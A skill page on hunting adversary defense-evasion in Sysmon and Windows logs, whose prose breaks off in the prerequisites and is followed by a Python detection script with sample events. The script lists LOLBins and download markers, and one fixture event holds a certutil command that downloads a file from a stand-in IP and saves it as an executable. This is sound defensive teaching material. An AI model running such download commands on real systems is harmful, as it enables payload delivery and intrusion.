# Detecting Evasion Techniques in Endpoint Logs

## When to Use

Use this skill when:

- Hunting for adversary defense evasion techniques (MITRE ATT&CK TA0005) in endpoint telemetry
- Building detection rules for common evasion methods (process injection, timestomping, log clearing)
- Investigating incidents where adversaries disabled or bypassed security tools
- Analyzing endpoint logs for indicators of living-off-the-land binary (LOLBin) abuse

Do not use this skill for network-level evasion (use network traffic analysis) or for malware reverse engineering.

## Prerequisites

- Sysmon installed and confi…
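The four evasion methods named in the "When to Use" list (process injection, timestomping, log clearing, LOLBin abuse) each map to a small number of Sysmon or Windows event IDs. The following is an added example, not code from the original skill page: detection logic for all four run over constructed Sysmon and Windows event records. The event IDs used are the standard ones (Sysmon 1 ProcessCreate, 2 FileCreateTime, 8 CreateRemoteThread; Security 1102 and System 104 for log clearing); the LOLBin list and marker strings, the injection-source allowlist, the 30-day timestomp threshold and every sample value are assumptions for the demo, not values the page gives.

```python
"""Defense-evasion hunts over Sysmon and Windows event records.

Added example for this skill page, not code from the page itself. The event
dicts below are constructed to look like Sysmon / Windows events after JSON
conversion; field names follow the Sysmon schema, values are made up.
Allowlists, marker strings and thresholds are tuning assumptions.
"""
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

SYSMON = "Microsoft-Windows-Sysmon/Operational"
SYSMON_TS = "%Y-%m-%d %H:%M:%S.%f"  # format Sysmon uses for *UtcTime fields

# LOLBins often used for download/execute, plus command-line fragments that
# separate abuse from routine use (assumed starting list; extend per environment).
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}
LOLBIN_MARKERS = ("http://", "https://", "-urlcache", "-decode", "javascript:", "scrobj.dll", "/transfer")

# Images allowed to create threads in other processes (assumed allowlist).
INJECTION_SOURCE_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}

# A creation time rewound by more than this is treated as timestomping (assumed).
TIMESTOMP_THRESHOLD = timedelta(days=30)


def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'certutil.exe'."""
    return PureWindowsPath(path).name.lower()


def detect_lolbin(ev):
    """Sysmon EID 1 (ProcessCreate): a LOLBin launched with a download/decode marker."""
    if ev["Channel"] != SYSMON or ev["EventID"] != 1:
        return None
    if basename(ev["Image"]) not in LOLBINS:
        return None
    cmd = ev.get("CommandLine", "").lower()
    return "lolbin_abuse" if any(m in cmd for m in LOLBIN_MARKERS) else None


def detect_timestomp(ev):
    """Sysmon EID 2 (FileCreateTime): creation time moved far into the past."""
    if ev["Channel"] != SYSMON or ev["EventID"] != 2:
        return None
    prev = datetime.strptime(ev["PreviousCreationUtcTime"], SYSMON_TS)
    new = datetime.strptime(ev["CreationUtcTime"], SYSMON_TS)
    return "timestomping" if prev - new > TIMESTOMP_THRESHOLD else None


def detect_injection(ev):
    """Sysmon EID 8 (CreateRemoteThread): cross-process thread from a non-allowlisted image."""
    if ev["Channel"] != SYSMON or ev["EventID"] != 8:
        return None
    src, dst = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    return "process_injection" if src != dst and src not in INJECTION_SOURCE_ALLOWLIST else None


def detect_log_clear(ev):
    """Security 1102 (audit log cleared) or System 104 (event log cleared)."""
    if (ev["Channel"], ev["EventID"]) in {("Security", 1102), ("System", 104)}:
        return "log_cleared"
    return None


RULES = (detect_lolbin, detect_timestomp, detect_injection, detect_log_clear)


def hunt(events):
    """Return (event index, rule name) for every rule hit, in event order."""
    findings = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((idx, hit))
    return findings


# Constructed sample telemetry: four true positives interleaved with benign look-alikes.
SAMPLE_EVENTS = [
    {"Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.txt C:\Users\Public\x.exe"},
    {"Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},              # routine rundll32 use
    {"Channel": SYSMON, "EventID": 2, "Image": r"C:\Users\Public\x.exe",
     "TargetFilename": r"C:\Users\Public\x.exe",
     "PreviousCreationUtcTime": "2024-03-12 09:00:00.000",
     "CreationUtcTime": "2019-01-01 00:00:00.000"},                         # rewound five years
    {"Channel": SYSMON, "EventID": 2, "Image": r"C:\Program Files\7-Zip\7z.exe",
     "TargetFilename": r"C:\Users\bob\doc.pdf",
     "PreviousCreationUtcTime": "2024-03-12 09:00:00.000",
     "CreationUtcTime": "2024-03-11 18:00:00.000"},                         # archive extraction
    {"Channel": SYSMON, "EventID": 8, "SourceImage": r"C:\Users\Public\x.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"Channel": SYSMON, "EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe"},                    # allowlisted source
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "bob"},
    {"Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule is deliberately narrow so its false positives are predictable: archive extractors and installers also rewrite creation times (hence the threshold rather than flagging every EID 2), security products and some system processes legitimately create remote threads (hence the source allowlist), and rundll32 or regsvr32 run constantly on a healthy host (hence requiring a download or decode marker in the command line). Log clearing has no benign look-alike in normal operation, so 1102/104 fire unconditionally.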